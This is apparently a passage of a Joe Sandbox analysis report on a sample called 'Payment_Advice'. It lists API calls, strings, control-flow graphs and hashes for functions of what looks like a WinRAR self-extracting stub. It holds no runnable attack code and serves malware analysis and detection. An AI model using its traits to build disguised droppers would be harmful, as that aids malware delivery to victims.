                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 4ee35c1654bf793e9adb691d9fd74fd7ead413fca013bc92fe41bd5f845bace2
                                                                                                    • Instruction ID: 441d3ac4965c0367abd97d1f7359e9bcb74d10fcbfa1cea6c26aa3d7c6bc5ade
                                                                                                    • Opcode Fuzzy Hash: 4ee35c1654bf793e9adb691d9fd74fd7ead413fca013bc92fe41bd5f845bace2
                                                                                                    • Instruction Fuzzy Hash: 2C82FA71904246AEDF25DB64C895FFEBF79BF45300F0845B9D8899B2C2DB315A88CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00516CDC Relevance: .3, Instructions: 343COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 8ec6413e0ff385e40912b27040b2676d767fb66dc60c54220d2d9b8823dfd21d
                                                                                                    • Instruction ID: 22f32abcac111278c3226d92e5c970f9a2ef90020ec172ac8a618ae898a41446
                                                                                                    • Opcode Fuzzy Hash: 8ec6413e0ff385e40912b27040b2676d767fb66dc60c54220d2d9b8823dfd21d
                                                                                                    • Instruction Fuzzy Hash: 30D1C5B16083458FEB14CF28D84479BBFE5BF89308F044A6DE8899B242D774ED85CB56
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051B7E0 Relevance: 107.5, APIs: 49, Strings: 12, Instructions: 731windowfilesleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0051B7E5
                                                                                                      • Part of subcall function 00501316: GetDlgItem.USER32(00000000,00003021), ref: 0050135A
                                                                                                      • Part of subcall function 00501316: SetWindowTextW.USER32(00000000,005335F4), ref: 00501370
                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0051B8D1
                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0051B8EF
                                                                                                    • IsDialogMessageW.USER32(?,?), ref: 0051B902
                                                                                                    • TranslateMessage.USER32(?), ref: 0051B910
                                                                                                    • DispatchMessageW.USER32(?), ref: 0051B91A
                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0051B93D
                                                                                                    • EndDialog.USER32(?,00000001), ref: 0051B960
                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0051B983
                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0051B99E
                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,005335F4), ref: 0051B9B1
                                                                                                      • Part of subcall function 0051D453: _wcschr.LIBVCRUNTIME ref: 0051D45C
                                                                                                      • Part of subcall function 0051D453: _wcslen.LIBCMT ref: 0051D47D
                                                                                                    • SetFocus.USER32(00000000), ref: 0051B9B8
                                                                                                    • _swprintf.LIBCMT ref: 0051BA24
                                                                                                      • Part of subcall function 00504092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005040A5
                                                                                                      • Part of subcall function 0051D4D4: GetDlgItem.USER32(00000068,0055FCB8), ref: 0051D4E8
                                                                                                      • Part of subcall function 0051D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0051AF07,00000001,?,?,0051B7B9,0053506C,0055FCB8,0055FCB8,00001000,00000000,00000000), ref: 0051D510
                                                                                                      • Part of subcall function 0051D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0051D51B
                                                                                                      • Part of subcall function 0051D4D4: SendMessageW.USER32(00000000,000000C2,00000000,005335F4), ref: 0051D529
                                                                                                      • Part of subcall function 0051D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0051D53F
                                                                                                      • Part of subcall function 0051D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0051D559
                                                                                                      • Part of subcall function 0051D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0051D59D
                                                                                                      • Part of subcall function 0051D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0051D5AB
                                                                                                      • Part of subcall function 0051D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0051D5BA
                                                                                                      • Part of subcall function 0051D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0051D5E1
                                                                                                      • Part of subcall function 0051D4D4: SendMessageW.USER32(00000000,000000C2,00000000,005343F4), ref: 0051D5F0
                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0051BA68
                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0051BA90
                                                                                                    • GetTickCount.KERNEL32 ref: 0051BAAE
                                                                                                    • _swprintf.LIBCMT ref: 0051BAC2
                                                                                                    • GetLastError.KERNEL32(?,00000011), ref: 0051BAF4
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0051BB43
                                                                                                    • _swprintf.LIBCMT ref: 0051BB7C
                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0051BBD0
                                                                                                    • GetCommandLineW.KERNEL32 ref: 0051BBEA
                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0051BC47
                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0051BC6F
                                                                                                    • WaitForInputIdle.USER32(?,00002710), ref: 0051BCA5
                                                                                                    • Sleep.KERNEL32(00000064), ref: 0051BCB9
                                                                                                    • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0051BCE2
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0051BCEB
                                                                                                    • _swprintf.LIBCMT ref: 0051BD1E
                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0051BD7D
                                                                                                    • SetDlgItemTextW.USER32(?,00000065,005335F4), ref: 0051BD94
                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0051BD9D
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0051BDAC
                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0051BDBB
                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0051BE68
                                                                                                    • _wcslen.LIBCMT ref: 0051BEBE
                                                                                                    • _swprintf.LIBCMT ref: 0051BEE8
                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0051BF32
                                                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0051BF4C
                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0051BF55
                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0051BF6B
                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0051BF85
                                                                                                    • SetWindowTextW.USER32(00000000,0054A472), ref: 0051BFA7
                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0051C007
                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0051C01A
                                                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0051C0BD
                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0051C197
                                                                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0051C1D9
                                                                                                      • Part of subcall function 0051C73F: __EH_prolog.LIBCMT ref: 0051C744
                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0051C1FD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleIdleInputLineMappingModuleNameParamShellShowSleepTickTranslateUnmapWait__vswprintf_c_l_wcschr
                                                                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$^Q$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp$QS
                                                                                                    • API String ID: 270980416-3271375000
                                                                                                    • Opcode ID: b81ac8c5e16a506c98127ecea510a7e419fa4d50bc48abf5272a019b60e8087f
                                                                                                    • Instruction ID: 5b0abd055cbbb93df6f38e6053b729477b8d9c4c7174a44dbd48f6c31c35ebff
                                                                                                    • Opcode Fuzzy Hash: b81ac8c5e16a506c98127ecea510a7e419fa4d50bc48abf5272a019b60e8087f
                                                                                                    • Instruction Fuzzy Hash: E742E174984245BAFB21AB649C4EFFE3F6CBB62704F040095F641A61D2CBB55E8CDB21
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00510863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316libraryfileloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 267 510863-510886 call 51ec50 GetModuleHandleW 270 5108e7-510b48 267->270 271 510888-51089f GetProcAddress 267->271 274 510c14-510c40 GetModuleFileNameW call 50c29a call 510602 270->274 275 510b4e-510b59 call 5275fb 270->275 272 5108a1-5108b7 271->272 273 5108b9-5108c9 GetProcAddress 271->273 272->273 276 5108e5 273->276 277 5108cb-5108e0 273->277 289 510c42-510c4e call 50b146 274->289 275->274 283 510b5f-510b8d GetModuleFileNameW CreateFileW 275->283 276->270 277->276 286 510c08-510c0f CloseHandle 283->286 287 510b8f-510b9b SetFilePointer 283->287 286->274 287->286 290 510b9d-510bb9 ReadFile 287->290 296 510c50-510c5b call 51081b 289->296 297 510c7d-510ca4 call 50c310 GetFileAttributesW 289->297 290->286 293 510bbb-510be0 290->293 295 510bfd-510c06 call 510371 293->295 295->286 304 510be2-510bfc call 51081b 295->304 296->297 306 510c5d-510c7b CompareStringW 296->306 307 510ca6-510caa 297->307 308 510cae 297->308 304->295 306->297 306->307 307->289 310 510cac 307->310 311 510cb0-510cb5 308->311 310->311 312 510cb7 311->312 313 510cec-510cee 311->313 316 510cb9-510ce0 call 50c310 GetFileAttributesW 312->316 314 510cf4-510d0b call 50c2e4 call 50b146 313->314 315 510dfb-510e05 313->315 326 510d73-510da6 call 504092 AllocConsole 314->326 327 510d0d-510d6e call 51081b * 2 call 50e617 call 504092 call 50e617 call 51a7e4 314->327 321 510ce2-510ce6 316->321 322 510cea 316->322 321->316 324 510ce8 321->324 322->313 324->313 332 510df3-510df5 ExitProcess 326->332 333 510da8-510ded GetCurrentProcessId AttachConsole call 523e13 GetStdHandle WriteConsoleW Sleep FreeConsole 326->333 327->332 333->332
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32), ref: 0051087C
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0051088E
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 005108BF
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00510B69
                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00510B83
                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00510B93
                                                                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,|<S,00000000), ref: 00510BB1
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00510C09
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00510C1E
                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<S,?,00000000,?,00000800), ref: 00510C72
                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,|<S,00000800,?,00000000,?,00000800), ref: 00510C9C
                                                                                                    • GetFileAttributesW.KERNEL32(?,?,D=S,00000800), ref: 00510CD8
                                                                                                      • Part of subcall function 0051081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00510836
                                                                                                      • Part of subcall function 0051081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0050F2D8,Crypt32.dll,00000000,0050F35C,?,?,0050F33E,?,?,?), ref: 00510858
                                                                                                    • _swprintf.LIBCMT ref: 00510D4A
                                                                                                    • _swprintf.LIBCMT ref: 00510D96
                                                                                                      • Part of subcall function 00504092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005040A5
                                                                                                    • AllocConsole.KERNEL32 ref: 00510D9E
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00510DA8
                                                                                                    • AttachConsole.KERNEL32(00000000), ref: 00510DAF
                                                                                                    • _wcslen.LIBCMT ref: 00510DC4
                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00510DD5
                                                                                                    • WriteConsoleW.KERNEL32(00000000), ref: 00510DDC
                                                                                                    • Sleep.KERNEL32(00002710), ref: 00510DE7
                                                                                                    • FreeConsole.KERNEL32 ref: 00510DED
                                                                                                    • ExitProcess.KERNEL32 ref: 00510DF5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                    • String ID: (=S$,<S$,@S$0?S$0AS$4BS$8>S$D=S$DXGIDebug.dll$H?S$H@S$HAS$P>S$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=S$`@S$d?S$dAS$dwmapi.dll$h=S$h>S$kernel32$uxtheme.dll$|<S$|?S$|@S$<S$>S$?S$@S$AS
                                                                                                    • API String ID: 1207345701-2759046448
                                                                                                    • Opcode ID: 68d8e87b15c8e2248e49db3e3633965fab5e88bf1fd7cc4a15cc7a53eb672c1d
                                                                                                    • Instruction ID: 08f9e77566da7da94ce45122e9c30494300010282e7052befd1904d31e7a0df3
                                                                                                    • Opcode Fuzzy Hash: 68d8e87b15c8e2248e49db3e3633965fab5e88bf1fd7cc4a15cc7a53eb672c1d
                                                                                                    • Instruction Fuzzy Hash: 9DD171B1008385ABD3259F50D84DADFBFE8BF85704F50491DF1859A290DBB49A88CFA2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050DA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0050DA70
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0050DA91
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0050DAAC
                                                                                                      • Part of subcall function 0050C29A: _wcslen.LIBCMT ref: 0050C2A2
                                                                                                      • Part of subcall function 005105DA: _wcslen.LIBCMT ref: 005105E0
                                                                                                      • Part of subcall function 00511B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0050BAE9,00000000,?,?,?,00010440), ref: 00511BA0
                                                                                                    • _wcslen.LIBCMT ref: 0050DDE9
                                                                                                    • __fprintf_l.LIBCMT ref: 0050DF1C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9S
                                                                                                    • API String ID: 557298264-1325100120
                                                                                                    • Opcode ID: 110b8bcf5253894804ac3e02a6e28e5c4663e2b97346ed5a000dcb5eff4fd192
                                                                                                    • Instruction ID: ed905a44177dd65b47b131cb966c8d4feb1bfd9975d671978c9ced6252083a26
                                                                                                    • Opcode Fuzzy Hash: 110b8bcf5253894804ac3e02a6e28e5c4663e2b97346ed5a000dcb5eff4fd192
                                                                                                    • Instruction Fuzzy Hash: EF32D072900219DBDB24EFA8C84AAEE7FB9FF55300F50095AF905972C1E7B19D85CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 0051B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0051B579
                                                                                                      • Part of subcall function 0051B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0051B58A
                                                                                                      • Part of subcall function 0051B568: IsDialogMessageW.USER32(00010440,?), ref: 0051B59E
                                                                                                      • Part of subcall function 0051B568: TranslateMessage.USER32(?), ref: 0051B5AC
                                                                                                      • Part of subcall function 0051B568: DispatchMessageW.USER32(?), ref: 0051B5B6
                                                                                                    • GetDlgItem.USER32(00000068,0055FCB8), ref: 0051D4E8
                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,0051AF07,00000001,?,?,0051B7B9,0053506C,0055FCB8,0055FCB8,00001000,00000000,00000000), ref: 0051D510
                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0051D51B
                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,005335F4), ref: 0051D529
                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0051D53F
                                                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0051D559
                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0051D59D
                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0051D5AB
                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0051D5BA
                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0051D5E1
                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,005343F4), ref: 0051D5F0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                    • String ID: \
                                                                                                    • API String ID: 3569833718-2967466578
                                                                                                    • Opcode ID: c0db05bbcb3ff61496d5d33324b0aae7c64ae88275a585ff821651cd9d139923
                                                                                                    • Instruction ID: a70c0c4511880b97b48c3a78dc1256a347d1ae6bec37f217444d1b4f675ba9c0
                                                                                                    • Opcode Fuzzy Hash: c0db05bbcb3ff61496d5d33324b0aae7c64ae88275a585ff821651cd9d139923
                                                                                                    • Instruction Fuzzy Hash: B731AF71545342ABE301DB289C4AFAB7FACEBA2718F000518F95196290DBA49B0C9B76
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051D78F Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 184windowCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 681 51d78f-51d7a7 call 51ec50 684 51d9e8-51d9f0 681->684 685 51d7ad-51d7b9 call 523e13 681->685 685->684 688 51d7bf-51d7e7 call 51fff0 685->688 691 51d7f1-51d7ff 688->691 692 51d7e9 688->692 693 51d801-51d804 691->693 694 51d812-51d818 691->694 692->691 695 51d808-51d80e 693->695 696 51d85b-51d85e 694->696 697 51d810 695->697 698 51d837-51d844 695->698 696->695 699 51d860-51d866 696->699 700 51d822-51d82c 697->700 701 51d9c0-51d9c2 698->701 702 51d84a-51d84e 698->702 703 51d868-51d86b 699->703 704 51d86d-51d86f 699->704 707 51d81a-51d820 700->707 708 51d82e 700->708 709 51d9c6 701->709 702->709 710 51d854-51d859 702->710 703->704 706 51d882-51d898 call 50b92d 703->706 705 51d871-51d878 704->705 704->706 705->706 711 51d87a 705->711 716 51d8b1-51d8bc call 50a231 706->716 717 51d89a-51d8a7 call 511fbb 706->717 707->700 713 51d830-51d833 707->713 708->698 715 51d9cf 709->715 710->696 711->706 713->698 718 51d9d6-51d9d8 715->718 727 51d8d9-51d8e6 ShellExecuteExW 716->727 728 51d8be-51d8d5 call 50b6c4 716->728 717->716 726 51d8a9 717->726 721 51d9e7 718->721 722 51d9da-51d9dc 718->722 721->684 722->721 725 51d9de-51d9e1 ShowWindow 722->725 725->721 726->716 727->721 729 51d8ec-51d8f9 727->729 728->727 731 51d8fb-51d902 729->731 732 51d90c-51d90e 729->732 731->732 734 51d904-51d90a 731->734 735 51d910-51d919 IsWindowVisible 732->735 736 51d925-51d938 WaitForInputIdle call 51dc3b 732->736 734->732 737 51d97b-51d987 CloseHandle 734->737 735->736 738 51d91b-51d923 ShowWindow 735->738 740 51d93d-51d944 736->740 741 51d989-51d996 call 511fbb 737->741 742 51d998-51d9a6 737->742 738->736 740->737 745 51d946-51d94e 740->745 741->715 741->742 742->718 744 51d9a8-51d9aa 742->744 744->718 747 51d9ac-51d9b2 744->747 745->737 748 51d950-51d961 GetExitCodeProcess 745->748 747->718 749 51d9b4-51d9be 747->749 748->737 750 51d963-51d96d 748->750 749->718 751 51d974 750->751 752 51d96f 750->752 751->737 752->751
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 0051D7AE
                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 0051D8DE
                                                                                                    • IsWindowVisible.USER32(?), ref: 0051D911
                                                                                                    • ShowWindow.USER32(?,00000000), ref: 0051D91D
                                                                                                    • WaitForInputIdle.USER32(?,000007D0), ref: 0051D92E
                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 0051D959
                                                                                                    • CloseHandle.KERNEL32(?), ref: 0051D97F
                                                                                                    • ShowWindow.USER32(?,00000001), ref: 0051D9E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_wcslen
                                                                                                    • String ID: .exe$.inf
                                                                                                    • API String ID: 3646668279-3750412487
                                                                                                    • Opcode ID: 22a1d8f72b196750b7d89ec622ed62d8919a0a6b7702ce8d00a2438090542496
                                                                                                    • Instruction ID: 9c467d5c63997c1034cc01bb3a436f36a99b947f4c738884efe25a1735deedba
                                                                                                    • Opcode Fuzzy Hash: 22a1d8f72b196750b7d89ec622ed62d8919a0a6b7702ce8d00a2438090542496
                                                                                                    • Instruction Fuzzy Hash: 4B51BF75408384AAFB209B249844BEBBFF4BF96744F04081DF9C197191E7B589C9DB72
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051CE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
